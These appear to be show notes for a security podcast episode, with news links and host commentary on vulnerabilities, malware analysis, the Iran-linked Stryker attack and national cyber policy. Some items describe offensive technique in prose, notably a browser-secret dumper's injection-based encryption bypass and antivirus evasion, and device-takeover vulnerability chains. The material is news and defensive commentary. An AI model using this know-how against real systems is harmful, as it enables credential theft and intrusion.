Vulnerability Mis-Management – PSW #917

Paul Asadoorian

1. The Internet Was Weeks Away From Disaster and No One Knew

   This was a great little documentary on the XZ backdoor. It starts at the beginning of open-source. Even though they didn't attribute Linus's law correctly: "Given enough eyeballs, all bugs are shallow" — coined by Eric S. Raymond in his 1999 essay and book The Cathedral and the Bazaar. It is named Linus's Law in honor of Linus Torvalds, which is why it's often misattributed to him."

2. Zero Day Clock

   This is worth showing as it tracks interesting stats...

3. Reevaluating vulnerability management

   Adrian points out and backs up much of what we have been saying about vuln management: It's not working or keeping up. Given that, what do we do? We can solve the asset identification problem with technology, but that's just the first step. We still need to store the data and act on the data...

4. Spoofing An Emergency Traffic Preemption Signal

   While some claim to do this with a Flipper Zero, this person acquired an actual device that would sit on a traffic light and reverse-engineered it. Turns out at least some of these systems are preprogrammed with vehicle IDs, and without them, you can't change the traffic lights...

5. Hi-IR-Brid – High Power Flipper Zero IR Module by Jaay’s Electronics on Tindie

   This is a great price. Not sure if it works, but looks awesome.

6. Claude Static Binary Analysis of BPFDoor Malware on Linux

   If you give Claude the right tools it does an amazing job at reverse engineering malware. It's gotten much better over time and this is a great example. It automates things like hashing the file(s) and so much more. Check this one out, then you can go build a Claude malware analyzer for yourself. I mostly analyze Linux binaries, so mine is tuned for that. There are probably entire projects that show you how to use Claude for this, and its on my list to make skills and such to make this even better. Also, speaking of tools, one of the tools I incorporate in Claude is radare2, and next week we will be interviewing the creator and lead developer who goes by the handle "pancake". Don't miss it!

7. Stranger Things Meets Cybersecurity: Lessons from the Hive Mind

   Articles like this are fun, and I enjoyed Stranger Things, and relating that to infosec was neat, but admittedly I enjoyed the ST references more than the infosec references.

8. InstallFix: Weaponizing malvertized install guides

   InstallFix is a new attack category where threat actors clone installation pages of legitimate CLI tools — like Anthropic's Claude Code — and swap out the real curl | bash one-liner with a malicious one . The victim sees a pixel-perfect replica of the real site and copies what looks like a normal install command.

9. NVD – CVE-2025-20064

   Why does Intel publish advisories that read like this: "System software adversary with a privileged user combined with a high complexity attack may enable local code execution. This result may potentially occur via local access when attack requirements are not present without special internal knowledge and requires no user interaction. The potential vulnerability may impact the confidentiality (high), integrity (high) and availability (high) of the vulnerable system, resulting in subsequent system confidentiality (high), integrity (high) and availability (high) impacts." - My head hurts. Can we not just write English and form readable sentences to describe a vulnerability any more? I'm so confused...

10. GitHub – Maldev-Academy/DumpBrowserSecrets

    Some notable items:

    • Rather than patching Chrome's elevation service or abusing IElevator directly from an external process (which fails due to identity checks), it spawns a headless Chromium process and injects a DLL via Early Bird APC injection — queuing execution before the main thread starts. The injected DLL calls IElevator from within the legitimate Chromium process context, then pipes the decrypted key back via a named pipe. This is a cleaner and more reliable ABE bypass than most public PoCs, which typically require patching the service or running as SYSTEM.
    • Version 1.1.1 introduced SQLoot, a custom SQLite3 file format parser that replaces the standard sqlite-amalgamation library. This directly reduces the compiled binary's static footprint and removes a well-known library signature that EDRs and AV engines key on.
11. GitHub – pasadoorian/MiTMBeast

    I presented this tool on a prior technical segment. I've quietly released it, up until now. Its the tool I use to create a separate network for analyzing IoT and appliances, and now its open-source! It's really just some Bash scripts that help automate setting up and maintaining an environment for network traffic snooping, interception, and collection.

12. D-LINK Exploit Repo

    Some of these vulnerabilities and exploits were released recently. Interesting repo with a TON of exploits for D-LINK devices, even though some of the "exploits" are just instructions on how to find and test the vulnerability, leaving weaponization as an exercise for the reader. Use at your own risk, I did not test or validate this!

13. HPE Aruba Networking AOS-CX, Multiple Vulnerabilities

    CVE-2026-23813 (CVSS 9.8) is an unauthenticated auth bypass with admin password reset — no creds, no interaction, just network access to the management interface . That's your crown jewel. Pair it with three command injection bugs (CVE-2026-23814, -23815, -23816) that let attackers escape the CLI sandbox and execute arbitrary OS commands on the underlying Linux system , and you've got a full device takeover chain on switches that sit at the core of enterprise networks.

14. CVE-2026-3611: Unauthenticated IQ4 Web HMI Exposes Critical BMS Risk

    Crux of the issue:

    • When an IQ4 controller is in its factory-default configuration, and no user module is enabled, the embedded web HMI is available without authentication.
    • In that default state, the system runs under a privileged context (described by researchers as System User, level 100), granting read/write capabilities.
    • Authentication enforcement is only enabled after a web user account is created through a web endpoint (U.htm) that dynamically activates the user module.
    • Crucially, the endpoint used to create the first web user is accessible before authentication. This means a remote actor who can access the HTTP interface can create an administrative account using attacker-controlled credentials — thereby enabling authentication under their control.

    This could be interesting as: "The IQ4 family...is a line of building-management system (BMS) controllers used to manage HVAC, lighting, and other building automation functions across commercial, healthcare, government, and industrial facilities."

15. Release v2.0.0b1 · mandiant/speakeasy

    I need to start using this:

    Speakeasy is Mandiant's Windows kernel/user-mode emulator designed for scalable malware analysis without running code on bare metal. The v2.0.0b1 release is notable for several reasons: ​ * Unicorn 2 migration — Moving to Unicorn 2 modernizes the entire emulation core. This is a foundational change that improves accuracy and maintainability of the whole framework. * Complex multi-stage unpacking — The updated engine now handles deeply nested, multi-stage packers and loaders more reliably. This is critical for modern malware that uses layered obfuscation/packing (e.g., Cobalt Strike loaders, advanced ransomware stagers). * Deep system introspection — Enhanced ability to inspect internal system state during emulation, which is valuable for behavioral analysis and shellcode triage. * API traces on par with sandboxes — This is arguably the most impactful claim. Speakeasy's API call tracing now approaches the fidelity of full dynamic sandboxes (like Cuckoo or ANY.RUN), but without the overhead of a real OS. For high-volume malware triage at scale, this is a major capability uplift.

16. GitHub – ghostvectoracademy/DLLHijackHunter: Automated DLL Hijacking Discovery, Validation, and Confirmation. Turning local misconfigurations into weaponized, confirmed attack paths.

    I like this approach for this reason: "Rather than just flagging missing DLLs (which produces tons of false positives), it drops a canary DLL into the target path and uses a named pipe to confirm whether the DLL actually gets loaded and executed. This proves exploitability rather than just theoretical possibility."

17. 14 old software bugs that took way too long to squash

    This disproves the theory that "all bugs are shallow given enough eyes", perhaps classes of bugs fall into this category, but not security vulnerabilities. Vulnerabilities are tricky to spot, and go undetected in software for long periods of time. If they were easy to spot, or developers really truly knew how to not introduce them, we wouldn't have 319,790 CVEs in the database (that number is from today). And, that's not all the vulnerabilities that have been disclosed, the number is much higher. My fear: Someone knows about vulnerabilities that have not been disclosed and is not disclosing them. If we are discovering vulnerabilities after they are exploited, we are losing.

18. LILYGO to debut Spark, a cross-platform hub and flash tool for ESP devices

    LILYGO, while still in BETA, has a new tool and ecosystem similar to M5 Stack's M5burner. It has a bunch of new tools and the ability to "Browse, search, and download official & community firmware for LILYGO devices". Can't wait to try this out.

19. espflash – a new Go tool to serially flash firmware to Espressif devices

    The official esptool.py is still far superior in terms of features, however, if you need a small flasher written in Go, or want to flash devices using Go native code, epflash is interesting.

Jeff Man

1. Stryker cyber attack LIVE: Hackers cripple medical giant’s global systems

   One of my co-workers tipped me off to this because a friend of theirs was impacted. Stryker is a global leader in medical technology, manufacturing products for orthopaedics, medical/surgical, and neurotechnology. All IT systems at Stryker remain down after the cyber attack. The Iranian-backed hacking group, Handala, is allegedly claiming to have taken responsibility for the attack.

2. Iran War: The Convergence of Cyber and Kinetic Warfare

   Might as well stick to this theme. Offensive cyber operations are a large part of this conflict with U.S., Israel, and Iran.

3. US entities face heightened cyber risk related to Iran war

   "The military campaign against Iran is putting local governments, critical infrastructure providers and major U.S. companies at heightened risk of disruptive attacks." How is this statement true based on the classic risk equation? What's changed is the heightened resolve or intent of the adversary (threat).

4. Securing Critical Infrastructure in a Time of War

   "Danger, Will Robinson!"

5. President Trump’s Cyber Strategy for America

   Good thing we finally have a national cyber strategy! This was released late last Friday.

6. New National Cyber Strategy and EO Lays Out a Path for Combating Cybercrime and Promoting Innovation

   Also release last Friday was an Executive Order focused on cybercrime and a fact sheet. This article summarizes all three.

7. COMBATING CYBERCRIME, FRAUD, AND PREDATORY SCHEMES AGAINST AMERICAN CITIZENS

   Sure seems to be laying the framework for offensive and perhaps pre-emptive cyber operations against all enemies foreign and domestic.

8. Fact Sheet: President Donald J. Trump Combats Cybercrime, Fraud, and Predatory Schemes Against American Citizens

   Reads more like talking points for any press or media coverage.

Larry Pesce

1. Tile’s Security Is So Bad It’s a Feature for Stalkers
2. AI allows hackers to identify anonymous social media accounts, study finds
3. From One Thousand Pages of Specification to Unveiling Hidden Bugs: Large Language Model Assisted Fuzzing of Matter IoT Devices
4. Reverse-engineering the UniFi inform protocol — Tamarack
5. How We Hacked McKinsey’s AI Platform
6. MedTech Giant Stryker Crippled by Iran-Linked Hacker Attack

Lee Neely

1. Coruna: The Mysterious Journey of a Powerful iOS Exploit Kit

   Google Threat Intelligence Group (GTIG) has identified a new and powerful exploit kit targeting Apple iPhone models running iOS version 13.0 (released in September 2019) up to version 17.2.1 (released in December 2023). The exploit kit, named “Coruna” by its developers, contained five full iOS exploit chains and a total of 23 exploits. The core technical value of this exploit kit lies in its comprehensive collection of iOS exploits, with the most advanced ones using non-public exploitation techniques and mitigation bypasses.

   These patched flaws in Apple products have been added to the CISA KEV following a threat intelligence report from Google that describes campaigns targeting iOS 13.0 to iOS 17.2.1 with a "comprehensive collection" of exploits. CVE-2021-30952, CVE-2023-41974 and CVE-2023-43000 with due dates of 3/26/26.

2. NIST Urged to Go Deep in OT Security Guidance

   Experts are weighing in on SP 800-82 revisions. The current guidance is from 2023 and in need of updates.

   Three major vendors — Dragos, Claroty, and Armis — shared their NIST input with Gov Infosecurity parent company Information Security Media Group (ISMG). All three asked "for more detailed, specific guidance for OT owners and operators, especially on issues like vulnerability management." Dragos Vice President of Public Policy and Government Affairs Kate Diemidio noted that "The more granular and specific these frameworks and guidelines can get, the more helpful it is." The feedback also called for "more sector-specific guidance for emerging OT verticals like smart building management and distributed energy systems, such as electric vehicle charging networks." The vendors also voiced agreement with NIST's proposal to move some appendices online and make them "dynamic web resources." Claroty's comments urge NIST to "emphasize the importance of vendor transparency regarding patch validation," and to encourage vendors to issue disclosures in machine-readable formats "that map specific fixes to specific hardware/firmware variations."

3. EU court adviser says banks must immediately refund phishing victims

   Athanasios Rantos, the Advocate General of the Court of Justice of the EU (CJEU), has issued a formal opinion suggesting that banks must immediately refund account holders affected by unauthorized transactions, even when it's their fault.

   Under EU law, unless the bank suspects customer fraud, the first step for a payment service provider must always be to refund the transaction, contends Rantos. Afterward, however, if the bank provides evidence establishing failure or gross negligence by the customer in their obligations to protect their own data, the customer may be required to bear the losses or enter litigation with the bank.

4. Ericsson US discloses data breach after service provider hack

   Ericsson Inc. has sent notification letters to an undisclosed number of individuals to inform them that their personal information was compromised in a cyberattack on one of the company's service providers. Ericsson Inc. is the US subsidiary of the Swedish networking and telecommunications company.

   They became aware of a suspicious event on April 28, 2025, investigation found the attackers were in their systems April 17-22, the investigation was completed Feb 28, 2026. That is just too long beween the breach and notification.

5. FBI warns of phishing attacks impersonating US city, county officials

   The FBI's Internet Crime Complaint Center (IC3) has published an alert warning of a phishing scheme that involves the impersonation of city and county officials fraudulently seeking payment for planning and zoning permits. The cybercriminals target businesses and individuals with active permit applications and contain detailed accurate information including property addresses, case numbers and tru names of officials, use official language, contain an invoice with itemized charges which are urgently due.

   FBI PSA: https://www.ic3.gov/PSA/2026/PSA260309?

6. Wikimedia Foundation/Product and Technology/Product Safety and Integrity/March 2026 User Script Incident – Meta-Wiki

   Wikimedia Foundation staff were conducting a security review of user-authored code across Wikimedia projects. During that review, we inadvertently activated dormant code that was then quickly identified to be malicious.

   The code was active for a 23-minute period. This caused page deletions on Meta-Wiki that have since been restored. To prevent the script from spreading further while we investigated, Wikimedia projects were set to read-only for about 2 hours, and all user JavaScript was temporarily disabled for most of the day.

   From John Pescatore: Just as bomb defusing procedures should never say “Cut the red wire AFTER you cut the blue wire…” the instructions for malicious code analysis should be clear about how to assure not executing the code in an operational environment.